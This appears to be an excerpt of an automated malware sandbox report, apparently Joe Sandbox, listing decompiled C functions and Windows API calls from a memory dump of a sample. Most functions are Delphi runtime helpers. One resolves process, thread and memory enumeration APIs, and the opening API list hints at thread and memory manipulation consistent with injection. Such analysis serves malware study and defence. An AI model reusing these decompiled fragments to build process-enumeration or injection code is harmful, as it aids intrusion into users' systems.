    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}







    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}




















    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}













    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}











    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}


























    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
